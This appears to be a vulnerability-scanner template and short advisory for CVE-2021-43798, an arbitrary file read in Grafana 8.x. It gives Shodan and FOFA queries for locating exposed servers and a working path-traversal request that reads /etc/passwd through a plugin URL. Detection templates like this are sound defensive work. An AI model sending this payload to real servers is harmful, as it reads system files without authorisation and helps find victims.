Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
shodan title:"Grafana"
fofa app="Grafana"
PoC代码[已公开]
id: CVE-2021-43798
info:
name: Grafana v8.x Arbitrary File Read
author: z0ne,dhiyaneshDk
severity: high
description: |
Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
shodan title:"Grafana"
fofa app="Grafana"
reference:
- https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
- https://nosec.org/home/detail/4914.html
- https://github.com/jas502n/Grafana-VulnTips
- https://nvd.nist.gov/vuln/detail/CVE-2021-43798
set:
verify_payload: randomLowercase(32)
rules:
r0:
request:
method: GET
path: /public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()